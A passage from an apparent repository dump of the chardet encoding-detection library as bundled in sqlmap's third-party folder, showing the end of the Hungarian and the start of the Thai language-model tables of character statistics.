,2,3,3,3,3,3,2,3,3,3,1,2,3,2,2,3,1,2,3,3,2,2,0,3,3,3,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,3,2,3,3,3,3,2,3,3,3,3,0,2,3,2,\n0,0,0,1,1,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,1,1,1,3,3,2,1,3,2,2,3,2,1,3,2,2,1,0,3,3,1,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,2,2,3,3,3,3,3,1,2,3,3,3,3,1,2,1,3,3,3,3,2,2,3,1,1,3,2,0,1,1,1,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,1,3,3,3,3,3,2,2,1,3,3,3,0,1,1,2,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,2,3,3,3,2,0,3,2,3,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,1,0,\n3,3,3,3,3,3,2,3,3,3,2,3,2,3,3,3,1,3,2,2,2,3,1,1,3,3,1,1,0,3,3,2,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,2,3,3,3,2,3,2,3,3,3,2,3,3,3,3,3,1,2,3,2,2,0,2,2,2,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,3,3,2,2,2,3,1,3,3,2,2,1,3,3,3,1,1,3,1,2,3,2,3,2,2,2,1,0,2,2,2,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,\n3,1,1,3,3,3,3,3,1,2,3,3,3,3,1,2,1,3,3,3,2,2,3,2,1,0,3,2,0,1,1,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,1,1,3,3,3,3,3,1,2,3,3,3,3,1,1,0,3,3,3,3,0,2,3,0,0,2,1,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,2,2,3,3,2,2,2,2,3,3,0,1,2,3,2,3,2,2,3,2,1,2,0,2,2,2,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,\n3,3,3,3,3,3,1,2,3,3,3,2,1,2,3,3,2,2,2,3,2,3,3,1,3,3,1,1,0,2,3,2,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,3,3,1,2,2,2,2,3,3,3,1,1,1,3,3,1,1,3,1,1,3,2,1,2,3,1,1,0,2,2,2,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,3,3,2,1,2,1,1,3,3,1,1,1,1,3,3,1,1,2,2,1,2,1,1,2,2,1,1,0,2,2,1,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,3,3,1,1,2,1,1,3,3,1,0,1,1,3,3,2,0,1,1,2,3,1,0,2,2,1,0,0,1,3,2,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,2,1,3,3,3,3,3,1,2,3,2,3,3,2,1,1,3,2,3,2,1,2,2,0,1,2,1,0,0,1,1,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,\n3,3,3,3,2,2,2,2,3,1,2,2,1,1,3,3,0,3,2,1,2,3,2,1,3,3,1,1,0,2,1,3,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,3,3,2,2,2,3,2,3,3,3,2,1,1,3,3,1,1,1,2,2,3,2,3,2,2,2,1,0,2,2,1,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n1,0,0,3,3,3,3,3,0,0,3,3,2,3,0,0,0,2,3,3,1,0,1,2,0,0,1,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,1,2,3,3,3,3,3,1,2,3,3,2,2,1,1,0,3,3,2,2,1,2,2,1,0,2,2,0,1,1,1,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,2,2,1,3,1,2,3,3,2,2,1,1,2,2,1,1,1,1,3,2,1,1,1,1,2,1,0,1,2,1,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,\n2,3,3,1,1,1,1,1,3,3,3,0,1,1,3,3,1,1,1,1,1,2,2,0,3,1,1,2,0,2,1,1,\n0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,\n3,1,0,1,2,1,2,2,0,1,2,3,1,2,0,0,0,2,1,1,1,1,1,2,0,0,1,1,0,0,0,0,\n1,2,1,2,2,2,1,2,1,2,0,2,0,2,2,1,1,2,1,1,2,1,1,1,0,1,0,0,0,1,1,0,\n1,1,1,2,3,2,3,3,0,1,2,2,3,1,0,1,0,2,1,2,2,0,1,1,0,0,1,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,3,3,2,2,1,0,0,3,2,3,2,0,0,0,1,1,3,0,0,1,1,0,0,2,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,1,1,2,2,3,3,1,0,1,3,2,3,1,1,1,0,1,1,1,1,1,3,1,0,0,2,2,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,1,1,1,2,2,2,1,0,1,2,3,3,2,0,0,0,2,1,1,1,2,1,1,1,0,1,1,1,0,0,0,\n1,2,2,2,2,2,1,1,1,2,0,2,1,1,1,1,1,2,1,1,1,1,1,1,0,1,1,1,0,0,1,1,\n3,2,2,1,0,0,1,1,2,2,0,3,0,1,2,1,1,0,0,1,1,1,0,1,1,1,1,0,2,1,1,1,\n2,2,1,1,1,2,1,2,1,1,1,1,1,1,1,2,1,1,1,2,3,1,1,1,1,1,1,1,1,1,0,1,\n2,3,3,0,1,0,0,0,3,3,1,0,0,1,2,2,1,0,0,0,0,2,0,0,1,1,1,0,2,1,1,1,\n2,1,1,1,1,1,1,2,1,1,0,1,1,0,1,1,1,0,1,2,1,1,0,1,1,1,1,1,1,1,0,1,\n2,3,3,0,1,0,0,0,2,2,0,0,0,0,1,2,2,0,0,0,0,1,0,0,1,1,0,0,2,0,1,0,\n2,1,1,1,1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,2,0,1,1,1,1,1,0,1,\n3,2,2,0,1,0,1,0,2,3,2,0,0,1,2,2,1,0,0,1,1,1,0,0,2,1,0,1,2,2,1,1,\n2,1,1,1,1,1,1,2,1,1,1,1,1,1,0,2,1,0,1,1,0,1,1,1,0,1,1,2,1,1,0,1,\n2,2,2,0,0,1,0,0,2,2,1,1,0,0,2,1,1,0,0,0,1,2,0,0,2,1,0,0,2,1,1,1,\n2,1,1,1,1,2,1,2,1,1,1,2,2,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,\n1,2,3,0,0,0,1,0,3,2,1,0,0,1,2,1,1,0,0,0,0,2,1,0,1,1,0,0,2,1,2,1,\n1,1,0,0,0,1,0,1,1,1,1,1,2,0,0,1,0,0,0,2,0,0,1,1,1,1,1,1,1,1,0,1,\n3,0,0,2,1,2,2,1,0,0,2,1,2,2,0,0,0,2,1,1,1,0,1,1,0,0,1,1,2,0,0,0,\n1,2,1,2,2,1,1,2,1,2,0,1,1,1,1,1,1,1,1,1,2,1,1,0,0,1,1,1,1,0,0,1,\n1,3,2,0,0,0,1,0,2,2,2,0,0,0,2,2,1,0,0,0,0,3,1,1,1,1,0,0,2,1,1,1,\n2,1,0,1,1,1,0,1,1,1,1,1,1,1,0,2,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1,\n2,3,2,0,0,0,1,0,2,2,0,0,0,0,2,1,1,0,0,0,0,2,1,0,1,1,0,0,2,1,1,0,\n2,1,1,1,1,2,1,2,1,2,0,1,1,1,0,2,1,1,1,2,1,1,1,1,0,1,1,1,1,1,0,1,\n3,1,1,2,2,2,3,2,1,1,2,2,1,1,0,1,0,2,2,1,1,1,1,1,0,0,1,1,0,1,1,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,0,0,0,0,0,2,2,0,0,0,0,2,2,1,0,0,0,1,1,0,0,1,2,0,0,2,1,1,1,\n2,2,1,1,1,2,1,2,1,1,0,1,1,1,1,2,1,1,1,2,1,1,1,1,0,1,2,1,1,1,0,1,\n1,0,0,1,2,3,2,1,0,0,2,0,1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,0,0,0,0,\n1,2,1,2,1,2,1,1,1,2,0,2,1,1,1,0,1,2,0,0,1,1,1,0,0,0,0,0,0,0,0,0,\n2,3,2,0,0,0,0,0,1,1,2,1,0,0,1,1,1,0,0,0,0,2,0,0,1,1,0,0,2,1,1,1,\n2,1,1,1,1,1,1,2,1,0,1,1,1,1,0,2,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,1,\n1,2,2,0,1,1,1,0,2,2,2,0,0,0,3,2,1,0,0,0,1,1,0,0,1,1,0,1,1,1,0,0,\n1,1,0,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,2,1,1,1,0,0,1,1,1,0,1,0,1,\n2,1,0,2,1,1,2,2,1,1,2,1,1,1,0,0,0,1,1,0,1,1,1,1,0,0,1,1,1,0,0,0,\n1,2,2,2,2,2,1,1,1,2,0,2,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,1,0,\n1,2,3,0,0,0,1,0,2,2,0,0,0,0,2,2,0,0,0,0,0,1,0,0,1,0,0,0,2,0,1,0,\n2,1,1,1,1,1,0,2,0,0,0,1,2,1,1,1,1,0,1,2,0,1,0,1,0,1,1,1,0,1,0,1,\n2,2,2,0,0,0,1,0,2,1,2,0,0,0,1,1,2,0,0,0,0,1,0,0,1,1,0,0,2,1,0,1,\n2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,0,1,1,1,1,1,0,1,\n1,2,2,0,0,0,1,0,2,2,2,0,0,0,1,1,0,0,0,0,0,1,1,0,2,0,0,1,1,1,0,1,\n1,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,1,1,0,0,0,1,\n1,0,0,1,0,1,2,1,0,0,1,1,1,2,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,0,0,\n0,2,1,2,1,1,1,1,1,2,0,2,0,1,1,0,1,2,1,0,1,1,1,0,0,0,0,0,0,1,0,0,\n2,1,1,0,1,2,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,2,1,0,1,\n2,2,1,1,1,1,1,2,1,1,0,1,1,1,1,2,1,1,1,2,1,1,0,1,0,1,1,1,1,1,0,1,\n1,2,2,0,0,0,0,0,1,1,0,0,0,0,2,1,0,0,0,0,0,2,0,0,2,2,0,0,2,0,0,1,\n2,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,1,\n1,1,2,0,0,3,1,0,2,1,1,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,0,\n1,2,1,0,1,1,1,2,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,0,1,0,0,\n2,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,2,0,0,0,\n2,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,2,1,1,0,0,1,1,1,1,1,0,1,\n2,1,1,1,2,1,1,1,0,1,1,2,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,1,0,1,1,1,1,1,0,0,1,1,2,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,1,0,0,0,\n1,2,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0,\n2,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,1,1,1,2,0,0,1,0,0,1,0,1,0,0,0,\n0,1,1,1,1,1,1,1,1,2,0,1,1,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,\n1,0,0,1,1,1,1,1,0,0,2,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,\n0,1,1,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,\n1,0,0,1,1,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,\n0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,\n0,0,0,1,0,0,0,0,0,0,1,1,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,1,1,1,0,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,\n2,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,\n0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,\n)\n\nLatin2HungarianModel = {\n  'char_to_order_map': Latin2_HungarianCharToOrderMap,\n  'precedence_matrix': HungarianLangModel,\n  'typical_positive_ratio': 0.947368,\n  'keep_english_letter': True,\n  'charset_name': \"ISO-8859-2\",\n  'language': 'Hungarian',\n}\n\nWin1250HungarianModel = {\n  'char_to_order_map': win1250HungarianCharToOrderMap,\n  'precedence_matrix': HungarianLangModel,\n  'typical_positive_ratio': 0.947368,\n  'keep_english_letter': True,\n  'charset_name': \"windows-1250\",\n  'language': 'Hungarian',\n}\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/langthaimodel.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# 255: Control characters that usually does not exist in any text\n# 254: Carriage/Return\n# 253: symbol (punctuation) that does not belong to word\n# 252: 0 - 9\n\n# The following result for thai was collected from a limited sample (1M).\n\n# Character Mapping Table:\nTIS620CharToOrderMap = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111,  # 40\n188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253,  # 50\n253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82,  # 60\n 96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253,  # 70\n209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222,\n223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235,\n236,  5, 30,237, 24,238, 75,  8, 26, 52, 34, 51,119, 47, 58, 57,\n 49, 53, 55, 43, 20, 19, 44, 14, 48,  3, 17, 25, 39, 62, 31, 54,\n 45,  9, 16,  2, 61, 15,239, 12, 42, 46, 18, 21, 76,  4, 66, 63,\n 22, 10,  1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244,\n 11, 28, 41, 29, 33,245, 50, 37,  6,  7, 67, 77, 38, 93,246,247,\n 68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253,\n)\n\n# Model Table:\n# total sequences: 100%\n# first 512 sequences: 92.6386%\n# first 1024 sequences:7.3177%\n# rest  sequences:     1.0230%\n# negative sequences:  0.0436%\nThaiLangModel = (\n0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3,\n0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2,\n3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3,\n0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1,\n3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2,\n3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1,\n3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2,\n3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1,\n3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1,\n3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,\n3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1,\n2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1,\n3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1,\n0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,\n3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1,\n0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,\n3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2,\n1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0,\n3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3,\n3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0,\n1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2,\n0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,\n2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3,\n0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0,\n3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1,\n2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,\n3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2,\n0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2,\n3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,\n3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0,\n2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,\n3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1,\n2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1,\n3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0,\n3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1,\n3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1,\n3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1,\n1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2,\n0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3,\n0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,\n3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0,\n3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1,\n1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0,\n3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1,\n3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,\n0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2,\n0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,\n0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0,\n0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0,\n1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1,\n1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1,\n3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1,\n0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,\n0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0,\n0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,\n3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0,\n3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0,\n0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1,\n0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0,\n0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1,\n0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,\n0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0,\n0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1,\n0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,\n